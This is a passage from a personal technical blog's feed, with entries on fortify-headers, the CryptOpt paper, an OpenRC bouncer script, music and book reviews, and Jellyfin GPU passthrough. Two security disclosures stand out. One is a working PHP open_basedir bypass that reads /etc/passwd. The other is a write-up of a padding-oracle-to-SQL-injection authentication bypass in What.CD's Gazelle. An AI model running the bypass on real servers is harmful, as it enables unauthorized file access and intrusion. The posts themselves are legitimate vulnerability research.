</code></pre></div>
<p>This makes the original function available when prefixed with <code>__orig</code>,
while allowing overloading.
On clang, the <a href="https://clang.llvm.org/docs/AttributeReference.html#pass-object-size-pass-dynamic-object-size"><code>pass_object_size</code>/<code>pass_dynamic_object_size</code></a>
attribute is used to pass down arguments size; the assembly label preventing
weird <a href="https://en.wikipedia.org/wiki/Name_mangling">mangling</a> issues. Since
it's only a label, despite being assembly, it's still portable across various
architectures. The <code>_FORTIFY_INLINE</code> macro contains all possible "please inline this
function" directives as possible, to avoid polluting the symbols.</p>
<p>There is of course a ton of <code>#ifdef</code>/<code>#if __has_atribute</code>/… to work around various
compiler intrinsics, like clang missing <code>__builtin_va_arg_pack</code> or gcc missing
<code>diagnose_if</code>, so that fortify-headers will always make use of the most
features available.</p>
<p>It is indeed a particularly gross pile of hacks,
but this is C, also known as "nice things and why we can't have them."</p>
<p>Thanks to <a href="https://u.2f30.org/sin/">sin</a> for creating the project and
maintaining it for years, <a href="https://daniel.micay.dev">strcat</a> for his inspiring
work on fortifying <a href="https://en.wikipedia.org/wiki/Bionic_(software)">bionic</a>,
<a href="https://github.com/q66">q66</a> for his clang patches and general support,
the friendly people from <a href="https://2f30.org">2f30</a> for their patience,
<a href="http://serge.liyun.free.fr/serge/">Serge Sans Paille</a> for his <a href="https://github.com/serge-sans-paille/fortify-test-suite">testsuite</a>,
<a href="https://people.freebsd.org/~kevans/">kevans</a> for his work on fortifying
<a href="https://reviews.freebsd.org/D32306">FreeBSD's libc</a>,
Red Hat from pushing <code>FORTIFY_SOURCE=2</code> and <code>FORTIFY_SOURCE=3</code> forward,
...</p></content><category term="security"></category></entry><entry><title>Paper notes: CryptOpt</title><link href="https://dustri.org/b/paper-notes-cryptopt.html" rel="alternate"></link><published>2023-12-01T12:30:00+01:00</published><updated>2023-12-01T12:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-12-01:/b/paper-notes-cryptopt.html</id><summary type="html"><ul>
<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
</ul>
<p>Cryptography is hard, high-performance one even more so: formal …</p></summary><content type="html"><ul>
<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
</ul>
<p>Cryptography is hard, high-performance one even more so: formal proof of
assembly implementations is horrible to model, and code generation from
formal proofs are hard to lower to high-performance assembly. The core idea of
CryptOpt is to treat this as a black box combinatorial optimization problem,
and bruteforce possible solutions in a smart way against an oracle.</p>
<p>More precisely:</p>
<ol>
<li>start from a known-correct implementation in
<a href="https://github.com/mit-plv/fiat-crypto">fiat-crypto</a> (a
coq-powered high-level to low-level IR proven translator) low-level IR;</li>
<li>lower it via a fuzzer-like machinery replacing/reordering operands
applying semantics-and-data-constrains-preserving transformations, which has an acceptable
search space because:<ul>
<li>it's straight-line no-aliasing constant-offset-pointers assembly;</li>
<li>transformations can be templatised, eg. <code>add ≍ clc; adcx</code>;</li>
</ul>
</li>
<li>lift the resulting x64 assembly to fiat-crypto low-level IR;</li>
<li>use a custom <a href="https://en.wikipedia.org/wiki/E-graph">e-graph</a> based
<em>equivalence checker</em> implemented as a mix between an SMT solver and a symbolic-execution engine;</li>
<li>if the new implementation is correct, benchmark it against the current;
fastest one, and keep it if it's outperforming it.</li>
<li><code>goto 2</code>.</li>
</ol>
<p>This approach has a couple of advantages:</p>
<ul>
<li>fuzzers are cheaper than highly specialised engineering time</li>
<li>porting implementations to new hardware is simply a matter of
running CryptOpt on it.</li>
<li>by lifting the assembly to fiat-crypto low-level IR,
there is no need to write complex formal proofs,
since fiat-crypto is already taking care of those.</li>
<li>controlling the mutations allows to ensure that
the implementation stays side-channel free.</li>
</ul>
<p>The main issue though, is that one needs to formally implement
whatever algorithm to optimize in fiat-crypto, which is not that easy (and
which the authors of the paper didn't do for libsecp256k1).</p>
<p>Implementation-wise, the author ran 200k mutations, with 20 initial candidates,
over 18 Fiat IR primitives, taking between 20 and 40 CPU hours. Interestingly,
since the equivalence-based verification is <em>slow</em> (between 0.1s and ~300s),
it's only done once at the end. They found out that "optimization progress is roughly logarithmic
in the number of mutations." CryptOpt generates code around 1.20 to 2.50 times
faster than gcc/clang for the same fiat-crypto generated C code. It's not
faster then OpenSSL (but offers formally verified correctness), but is
faster than libsecp256k1.</p>
<p>The paper was <a href="https://iacr.org/submit/files/slides/2023/rwc/rwc2023/85/slides.pdf">presented</a> at <a href="https://rwc.iacr.org/2023/program.php">Real World Crypto 2023</a>,
and like all good one, it came with an <a href="https://github.com/0xADE1A1DE/CryptOpt">implementation</a></p></content><category term="paper_notes"></category></entry><entry><title>Managing a bouncer via OpenRC</title><link href="https://dustri.org/b/managing-a-bouncer-via-openrc.html" rel="alternate"></link><published>2023-11-24T16:30:00+01:00</published><updated>2023-11-24T16:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-11-24:/b/managing-a-bouncer-via-openrc.html</id><summary type="html"><p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
tend to only work when one is connected, they're both running inside a
<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
But now that my hypervisor is automatically rebooting to apply security updates,
and during power …</p></summary><content type="html"><p>I'm an avid <a href="https://en.wikipedia.org/wiki/Internet_Relay_Chat">IRC</a>
user, and I'm using <a href="https://en.wikipedia.org/wiki/XMPP">XMPP</a> to idle on
<a href="https://tails.net/support/index.en.html">Tails</a>' chatrooms. Since protocols
tend to only work when one is connected, they're both running inside a
<a href="https://github.com/tmux/tmux">tmux</a> session, acting as a
<a href="https://en.wikipedia.org/wiki/BNC_(software)">bouncer</a>.
But now that my hypervisor is automatically rebooting to apply security updates,
and during power cuts via <a href="https://networkupstools.org/">nut</a>,
I needed a way to automatically restart the bouncer. Since
it's running in an <a href="https://www.alpinelinux.org/">Alpine Linux</a> container,
here is my solution in the form of an <a href="https://github.com/OpenRC/openrc">OpenRC</a>
service script, because I couldn't find one on the internet:</p>
<div class="codehilite"><pre><span></span><code><span class="ch">#!/sbin/openrc-run</span>
<span class="nv">USER</span><span class="o">=</span>jvoisin
<span class="nv">name</span><span class="o">=</span><span class="s2">&quot;chat&quot;</span>
<span class="nv">command_user</span><span class="o">=</span><span class="s2">&quot;</span><span class="nv">$USER</span><span class="s2">&quot;</span>
<span class="nv">command</span><span class="o">=</span>/usr/bin/tmux
<span class="nv">command_args</span><span class="o">=</span><span class="s2">&quot;new-session -s chat -d &#39;/usr/bin/weechat&#39; \; new-window &#39;/usr/bin/profanity&#39; \; select-window -t -1&quot;</span>
<span class="nv">pidfile</span><span class="o">=</span><span class="s2">&quot;/run/</span><span class="nv">$SVCNAME</span><span class="s2">.pid&quot;</span>
depend<span class="o">()</span><span class="w"> </span><span class="o">{</span>
<span class="w"> </span>need<span class="w"> </span>net
<span class="w"> </span>use<span class="w"> </span>dns<span class="w"> </span>
<span class="o">}</span><span class="w"> </span>
stop<span class="o">()</span><span class="w"> </span><span class="o">{</span>
<span class="w"> </span>su<span class="w"> </span><span class="s2">&quot;</span><span class="nv">$USER</span><span class="s2">&quot;</span><span class="w"> </span>-c<span class="w"> </span><span class="s1">&#39;tmux kill-session chat&#39;</span>
<span class="o">}</span>
</code></pre></div></content><category term="sysadmin"></category></entry><entry><title>Netra - Ingrats</title><link href="https://dustri.org/b/netra-ingrats.html" rel="alternate"></link><published>2023-11-18T22:45:00+01:00</published><updated>2023-11-18T22:45:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-11-18:/b/netra-ingrats.html</id><summary type="html"><p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren &amp; der Club of
Gore</a> in equal
measures, bound together with a …</p></summary><content type="html"><p><a href="https://hypnoticdirgerecords.bandcamp.com/album/ingrats"><img alt="Cover" src="https://dustri.org/b/images/netra_ingrats.jpg"></a></p>
<p><em>Ingrats</em> ("ungrateful ones" in French) is the 3<sup>rd</sup> album from
Netra, and it's a very lonely one, for I don't think it has any peers. A mix of
depressive black metal, trip hop, and jazz à la <a href="https://en.wikipedia.org/wiki/Bohren_%26_der_Club_of_Gore">Bohren &amp; der Club of
Gore</a> in equal
measures, bound together with a hint of depressive darkwave, resulting
in a not only surprisingly cohesive and daring record, but also an excessively
pleasant and honest one.</p>
<p>Opening with "Gimme a break", a mellow jazzy noir blues vibe where one wants to
snap in rhythm, things quickly devolve into blast beats, raw screams and
twisted guitar of "Everything’s Fine", arguably the most black-metal-esque song
of the album. Albeit it is way more than yet-another-black-metal-track,
morphing into something more complex, with an eerie piano melody, and some
almost gothic rock clear singing. The sudden transitions are perfectly
executed, and the work on the voices is truly delicious, resulting in an
alienating, impetuous yet melancholic track. "Underneath my words the ruins of
yours" is a subtle mix of trip-hop and atmospheric post-rock/darkwave,
pursuing with "Live with It", even more trip-hop, but this time with a
<a href="https://en.wikipedia.org/wiki/Syncopation">syncopated</a> rhythm, 80s gothic
rock, clean vocals and acoustic guitars, … it results in something like
Katatonia doing a feat with <a href="https://en.wikipedia.org/wiki/Gramatik">Gramatik</a>
and <a href="https://en.wikipedia.org/wiki/Ulver">Ulver</a> period early 2000s.</p>
<p>Then the calm before the storm, "Infinite bordedom", a one minute interlude of grainy piano under the rain,
announcing "Don't Keep Me Waiting", some sort of nihilist black metal track,
but with the noted presence of a saxophone and some clear touches of jazz. The presence of a whispered sample
from <a href="https://en.wikipedia.org/wiki/The_Minister">L’exercice de l’État</a>
has a gentle touch of <a href="https://www.metal-archives.com/bands/B%C3%A2%27a/3540445572">Ba'a</a>. Moving on
to "A Genuinely Benevolent Man", starting with synthesisers,
then a 4|4 kick resulting in something that could be on a <a href="https://en.wikipedia.org/wiki/VNV_Nation">VNV Nation</a> album.
Until it decays into something more raw, and when the shrieking vocals
are showing up, you didn't even realise that we've left the world of the darkwave
to return into the one of black metal.</p>
<p>"Paris or Me", dark and rainy, with bits of triptop percussion,
introducing "Could've, Should've, Would've", with tasteful hints of Depeche Mode, Dead Can Dance,
post-2000 Velvet Acid Christ, giving it a resolute tasteful darkwave-synth-pop-EBM
cocktail. The album ends with "Jusqu'au-boutiste", starting with some jazzy piano on a <a href="https://en.wikipedia.org/wiki/Bassline#Walking_bass">walking
bass</a>, turning into an ultra-saturated tremolo riff with blast beats,
and both worlds are alternating along the track, only interrupted by a very à
propos sample from <a href="https://en.wikipedia.org/wiki/Low_Down">Low Down</a>. It goes
on until the piano gets creepier and creepier, landing into strings,
morphing into dislocated tip-hop soul, beaching onto calm synthesisers,
and ending with raw black metal as background for electronic sounds.</p>
<p>As <a href="https://hypnoticdirgerecords.com/">Hypnotic Dirge Records</a>, the label on which the disc was produced, perfectly
summarised:</p>
<blockquote>
<p>The perfect soundtrack for late-night walks in the city. The material on
“Ingrats” is an all-out assault on the senses, a bitter pill that must be
swallowed as an accompaniment for self-reflection. An album which can connect
emotionally and leave you drained at the end.</p>
</blockquote></content><category term="music"></category></entry><entry><title>ini_set based open_basedir bypass</title><link href="https://dustri.org/b/ini_set-based-open_basedir-bypass.html" rel="alternate"></link><published>2023-11-03T16:30:00+01:00</published><updated>2023-11-03T16:30:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-11-03:/b/ini_set-based-open_basedir-bypass.html</id><summary type="html"><p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
by being the expected solution for his
<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
for InsomniHack Finals 2019, but has been known long before.</p>
<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
<blockquote>
<p>When a script tries to access the filesystem, for example using include,
or fopen(), the …</p></blockquote></summary><content type="html"><p>This one was burned by <a href="https://twitter.com/Blaklis_">Blaklis</a> in 2019,
by being the expected solution for his
<a href="https://github.com/Blaklis/my-challenges/tree/master/phuck3">Phuck3</a> challenge
for InsomniHack Finals 2019, but has been known long before.</p>
<p>In the words of <a href="https://www.php.net/manual/en/ini.core.php#ini.open-basedir">PHP's documentation</a> on <code>open_basedir</code>:</p>
<blockquote>
<p>When a script tries to access the filesystem, for example using include,
or fopen(), the location of the file is checked. When the file is outside the
specified directory-tree, PHP will refuse to access it. All symbolic links are
resolved, so it's not possible to avoid this restriction with a symlink. If the
file doesn't exist then the symlink couldn't be resolved and the filename is
compared to (a resolved) open_basedir. </p>
<p>[…]</p>
<p>open_basedir is just an extra safety net, that is in no way comprehensive, and can therefore not be relied upon when security is needed. </p>
</blockquote>
<p>It has been more or less fixed in <a href="https://github.com/php/php-src/commit/ee9e07541f9f07762e3ee781102eea3a4190787c">March 2021</a>,
then again in <a href="https://github.com/php/php-src/commit/61e98bf35eb939bdd7b27ad7938f8549db2e1551">March 2023</a>,
and again in <a href="https://github.com/php/php-src/commit/9bcdf219ec6e8d6c2a55f1712b7d868b9129ef8d">July 2023</a>.
But I wouldn't be surprised if more low-hanging bypasses were lurking ;)</p>
<p>The crux of the bypass is that php didn't resolve relative paths both in
<code>ini_set</code> and when checking <code>php_check_open_basedir</code>:</p>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;?</span><span class="nx">php</span>
<span class="k">echo</span> <span class="nb">ini_get</span><span class="p">(</span><span class="s1">&#39;open_basedir&#39;</span><span class="p">);</span> <span class="c1">// /var/www/html</span>
<span class="nb">mkdir</span><span class="p">(</span><span class="s1">&#39;./tmp&#39;</span><span class="p">);</span>
<span class="nb">chdir</span><span class="p">(</span><span class="s1">&#39;./tmp&#39;</span><span class="p">);</span>
<span class="nb">ini_set</span><span class="p">(</span><span class="s1">&#39;open_basedir&#39;</span><span class="p">,</span> <span class="s1">&#39;..&#39;</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="nv">$i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="nv">$i</span> <span class="o">&lt;=</span> <span class="mi">24</span><span class="p">;</span> <span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nb">chdir</span><span class="p">(</span><span class="s1">&#39;..&#39;</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">ini_set</span><span class="p">(</span><span class="s1">&#39;open_basedir&#39;</span><span class="p">,</span><span class="s1">&#39;/&#39;</span><span class="p">)</span>
<span class="k">echo</span> <span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">&quot;/etc/passwd&quot;</span><span class="p">);</span>
</code></pre></div></content><category term="php"></category></entry><entry><title>Book review: Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking</title><link href="https://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html" rel="alternate"></link><published>2023-10-20T18:00:00+02:00</published><updated>2023-10-20T18:00:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-10-20:/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html</id><summary type="html"><p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
<p>I'm starting to feel guilty about getting ebooks for free from
<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
send them my way in exchange for a review, so I won't complain.</p>
<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
Impressioning …</a></p></summary><content type="html"><p><a href="https://nostarch.com/locksport"><img alt="Locksport's cover" src="https://dustri.org/b/images/locksport.png"></a></p>
<p>I'm starting to feel guilty about getting ebooks for free from
<a href="https://nostarch.com/about">No Starch Press</a>, but apparently they're happy to
send them my way in exchange for a review, so I won't complain.</p>
<p>Anyway, I got a copy of the early access version <a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking,
Impressioning, and Safe Cracking</a>!
It's obviously a book about lockpicking, but, as <em>hinted</em> by its name,
from the <a href="https://www.lockwiki.com/index.php/Locks port">sport</a> angle.</p>
<p>I'm not completely clueless when it comes to picking locks, but I've always been
mediocre at best, since I never really put the effort into practising anything
but the basics. This was thus a great opportunity for a deeper dive!
So I got myself a <a href="https://covertinstruments.com/collections/lockpicks/products/genesis-lock-pick">proper set of picks</a>,
3 cutaway training locks <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-serrated-pins">one with serrated pins</a>,
<a href="https://www.sparrowslockpicks.com/products/cut-away-lock-spool-pins">with spool pins</a>,
and <a href="https://www.sparrowslockpicks.com/products/cut-away-lock-check-pins">one with stupid chess pieces pins</a>,
and a couple of locks/padlocks from my local locksmith, and dove into the book!</p>
<p>I was a bit curious about its content, since I didn't bother reading the table of contents,
and was expecting a pile of techniques to open <a href="https://en.wikipedia.org/wiki/Wafer_tumbler_lock">wafer tumbler locks</a>
in the fastest way possible. But the book is so much more than that, with
historical perspectives, a bit of legalese, the proper etiquette to participate in lockpicking
competitions and how to organise one, anecdotes, mechanical details and
resources for those who <a href="https://en.wikipedia.org/wiki/Starship_Troopers_(film)">would like to know
more</a>, how to tear
apart, modify, take care of, and reassemble locks, where to get equipment,
how to <a href="https://www.lockwiki.com/index.php/Impressioning">impression keys</a>,
details on <a href="https://en.wikipedia.org/wiki/Lever_tumbler_lock">lever tumbler locks</a>
and <a href="https://en.wikipedia.org/wiki/Safe">vaults</a>,
…</p>
<p>The part about wafer locks, while interesting, doesn't really go much further
than some basic techniques for entry-level <a href="https://lockwiki.com/index.php/Security_pin#Security_pin_illustrations">security pins</a>,
but I guess practise is the only way to learn how to handle anything non-trivial anyway.
On the other hand, the part about lever locks was highly entertaining,
since those are really weird compared to the <em>usual</em> locks,
and I didn't know much about them.</p>
<p>I recently gifted myself a <a href="https://www.sparrowslockpicks.com/products/challenge-vault">Sparrow's challenge vault</a> for my birthday,
and was thus highly delighted to discover that the book has a whole section
on <a href="https://en.wikipedia.org/wiki/Safe-cracking">safe manipulation</a>; which is
fortunate since the instructions coming with the vault are <s>pure garbage</s>
confusing at best.</p>
<p>The only issue I had with the book is that while it's full of gorgeous colourful
pictures, like the small marks left by pins during key impressioning,
they are unfortunately barely legible on my
<a href="https://www.pocketbook-int.com/ge/products/pocketbook-inkpad-3">Pocketbook InkPad 3</a>,
so I'd recommend getting the paperback version if you don't have a 𝖙𝖗𝖚𝖊𝖈𝖔𝖑𝖔𝖗 4𝖐
𝕳𝕯𝕽 e-reader.</p>
<p>All in all, it's a really great self-contained book for newcomers and beginners,
entertaining, detailed, … and doing a tremendous job at making
lockpicking competitions look cool yet accessible! It was also a nice motivation booster for me to
tackle harder locks.</p>
<p>If you already know your way around locks, you might want to look at <a href="https://www.barnesandnoble.com/w/high-security-mechanical-locks-graham-pulford/1111341233">High-Security Mechanical Locks: An
Encyclopedic
Reference</a> instead.</p></content><category term="book_reviews"></category></entry><entry><title>Authentication bypass on What.CD's Gazelle</title><link href="https://dustri.org/b/authentication-bypass-on-whatcds-gazelle.html" rel="alternate"></link><published>2023-10-13T19:45:00+02:00</published><updated>2023-10-13T19:45:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-10-13:/b/authentication-bypass-on-whatcds-gazelle.html</id><summary type="html"><p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
their "web framework geared towards private BitTorrent tracker" anymore.
I've been sitting on this one for years, I know I wasn't the only one,
and it's not the only low-hanging vulnerability lurking there.</p>
<p>Rolling your own blunt …</p></summary><content type="html"><p><a href="https://en.wikipedia.org/wiki/What.CD">What.CD</a> has been dead since 2016, and
hopefully <a href="https://github.com/OPSnet/Gazelle/blob/master/app/Util/Crypto.php">nobody</a>
is using <a href="https://github.com/WhatCD/Gazelle">Gazelle</a>,
their "web framework geared towards private BitTorrent tracker" anymore.
I've been sitting on this one for years, I know I wasn't the only one,
and it's not the only low-hanging vulnerability lurking there.</p>
<p>Rolling your own blunt is alright, rolling your own authentication scheme
less so: there is a trivial <a href="https://en.wikipedia.org/wiki/Padding_oracle_attack">padding oracle</a>
in the <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/encrypt.class.php#L24">homegrown crypto scheme</a>:</p>
<div class="codehilite"><pre><span></span><code><span class="k">public</span> <span class="k">function</span> <span class="nf">decrypt</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">,</span> <span class="nv">$Key</span> <span class="o">=</span> <span class="nx">ENCKEY</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nv">$CryptStr</span> <span class="o">!=</span> <span class="s1">&#39;&#39;</span><span class="p">)</span> <span class="p">{</span>
<span class="nv">$IV</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span>
<span class="nv">$CryptStr</span> <span class="o">=</span> <span class="nb">substr</span><span class="p">(</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$CryptStr</span><span class="p">),</span> <span class="mi">16</span><span class="p">);</span>
<span class="k">return</span> <span class="nb">trim</span><span class="p">(</span><span class="nb">mcrypt_decrypt</span><span class="p">(</span><span class="nx">MCRYPT_RIJNDAEL_128</span><span class="p">,</span> <span class="nv">$Key</span><span class="p">,</span> <span class="nv">$CryptStr</span><span class="p">,</span> <span class="nx">MCRYPT_MODE_CBC</span><span class="p">,</span> <span class="nv">$IV</span><span class="p">));</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">return</span> <span class="s1">&#39;&#39;</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div>
<p>leading to an <a href="https://github.com/WhatCD/Gazelle/blob/master/classes/ajax_start.php#L23-L31">authentication bypass via a SQL injection</a>:</p>
<div class="codehilite"><pre><span></span><code><span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;session&#39;</span><span class="p">]))</span> <span class="p">{</span>
<span class="nv">$LoginCookie</span> <span class="o">=</span> <span class="nv">$Enc</span><span class="o">-&gt;</span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="s1">&#39;session&#39;</span><span class="p">]);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">))</span> <span class="p">{</span>
<span class="k">list</span><span class="p">(</span><span class="nv">$SessionID</span><span class="p">,</span> <span class="nv">$UserID</span><span class="p">)</span> <span class="o">=</span> <span class="nb">explode</span><span class="p">(</span><span class="s2">&quot;|~|&quot;</span><span class="p">,</span> <span class="nv">$Enc</span><span class="o">-&gt;</span><span class="na">decrypt</span><span class="p">(</span><span class="nv">$LoginCookie</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$UserID</span> <span class="o">||</span> <span class="o">!</span><span class="nv">$SessionID</span><span class="p">)</span> <span class="p">{</span>
<span class="k">die</span><span class="p">(</span><span class="s1">&#39;Not logged in!&#39;</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$Enabled</span> <span class="o">=</span> <span class="nv">$Cache</span><span class="o">-&gt;</span><span class="na">get_value</span><span class="p">(</span><span class="s2">&quot;enabled_</span><span class="si">$UserID</span><span class="s2">&quot;</span><span class="p">))</span> <span class="p">{</span>
<span class="k">require</span><span class="p">(</span><span class="nx">SERVER_ROOT</span><span class="o">.</span><span class="s1">&#39;/classes/mysql.class.php&#39;</span><span class="p">);</span> <span class="c1">//Require the database wrapper</span>
<span class="nv">$DB</span> <span class="o">=</span> <span class="k">NEW</span> <span class="nx">DB_MYSQL</span><span class="p">;</span> <span class="c1">//Load the database wrapper</span>
<span class="nv">$DB</span><span class="o">-&gt;</span><span class="na">query</span><span class="p">(</span><span class="s2">&quot;</span>
<span class="s2"> SELECT Enabled</span>
<span class="s2"> FROM users_main</span>
<span class="s2"> WHERE ID = &#39;</span><span class="si">$UserID</span><span class="s2">&#39;&quot;</span><span class="p">);</span>
<span class="k">list</span><span class="p">(</span><span class="nv">$Enabled</span><span class="p">)</span> <span class="o">=</span> <span class="nv">$DB</span><span class="o">-&gt;</span><span class="na">next_record</span><span class="p">();</span>
<span class="nv">$Cache</span><span class="o">-&gt;</span><span class="na">cache_value</span><span class="p">(</span><span class="s2">&quot;enabled_</span><span class="si">$UserID</span><span class="s2">&quot;</span><span class="p">,</span> <span class="nv">$Enabled</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">die</span><span class="p">(</span><span class="s1">&#39;Not logged in!&#39;</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div>
<p>Conveniently, the oracle doesn't touch the database, is completely stateless,
and only shows up in the httpd/reverse-proxy's logs, which shouldn't log the cookies'
content, making forensic analysis nigh impossible. Once you're admin, there are
a bunch of available SQL injections, like in
<a href="https://github.com/WhatCD/Gazelle/blob/master/sections/reportsv2/takeresolve.php"><code>takerevolve.php</code></a>.
From there, remote code execution is doable, but left as an exercise for the
reader.</p></content><category term="security"></category></entry><entry><title>Video acceleration in Jellyfin inside a Proxmox container</title><link href="https://dustri.org/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.html" rel="alternate"></link><published>2023-10-01T22:15:00+02:00</published><updated>2023-10-01T22:15:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-10-01:/b/video-acceleration-in-jellyfin-inside-a-proxmox-container.html</id><summary type="html"><p>For various reasons, including "video decoding is hard", "your web browser hates you"
and "watching movies on a phone over 3G is a basic human necessity",
enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
is a desirable goal if you don't want your CPU to set your house on fire. </p>
<p>To attain …</p></summary><content type="html"><p>For various reasons, including "video decoding is hard", "your web browser hates you"
and "watching movies on a phone over 3G is a basic human necessity",
enabling hardware-accelerated video decoding in <a href="https://jellyfin.org">Jellyfin</a>
is a desirable goal if you don't want your CPU to set your house on fire. </p>
<p>To attain it, one can mess around <a href="https://github.com/ddimick/proxmox-lxc-idmapper">cryptic gid mappings</a>,
but granting every user on the hypervisor the right to read/write <code>/dev/dri/renderD128</code> and
<code>/dev/dri/card0</code> is way easier, and it looks like this:</p>
<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>&gt;<span class="w"> </span>/etc/udev/rules.d/99-intel-chmod666.rules<span class="w"> </span>&lt;&lt;<span class="w"> </span><span class="s1">&#39;EOF&#39;</span>
<span class="go">KERNEL==&quot;renderD128&quot;, MODE=&quot;0666&quot;</span>
<span class="go">KERNEL==&quot;card0&quot;, MODE=&quot;0666&quot;</span>
<span class="go">EOF</span>
<span class="gp"># </span>udevadm<span class="w"> </span>control<span class="w"> </span>--reload-rules<span class="w"> </span><span class="o">&amp;&amp;</span><span class="w"> </span>udevadm<span class="w"> </span>trigger
<span class="gp">#</span>
</code></pre></div>
<p>It doesn't really worsen security, since:
- the devices are only mounted inside my jellyfin container, which would have
the same privileges as if I used gid mapping.
- odds are that an attacker able to get a shell on the hypervisor wouldn't
really need to have r/w access to the two devices to escalate their
privileges anyway, since they would either be:
- root already to escape from a container
- root already to escape from a vm
- whatever proxmox user and likely able to escalate to <code>root</code> trivially
- other users are sandboxed via systemd and/or seccomp.</p>
<p>Speaking of mounting things inside the container:</p>
<div class="codehilite"><pre><span></span><code><span class="gp"># </span>cat<span class="w"> </span>&gt;<span class="w"> </span>/etc/pve/lxc/114.conf<span class="w"> </span>&lt;&lt;<span class="w"> </span><span class="s1">&#39;EOF&#39;</span>
<span class="go">lxc.cgroup2.devices.allow: c 226:0 rwm</span>
<span class="go">lxc.cgroup2.devices.allow: c 226:128 rwm</span>
<span class="go">lxc.mount.entry: /dev/dri dev/dri none bind,optional,create=dir</span>
<span class="go">lxc.mount.entry: /dev/dri/renderD128 dev/renderD128 none bind,optional,create=file</span>
<span class="go">EOF</span>
<span class="gp">#</span>
</code></pre></div>
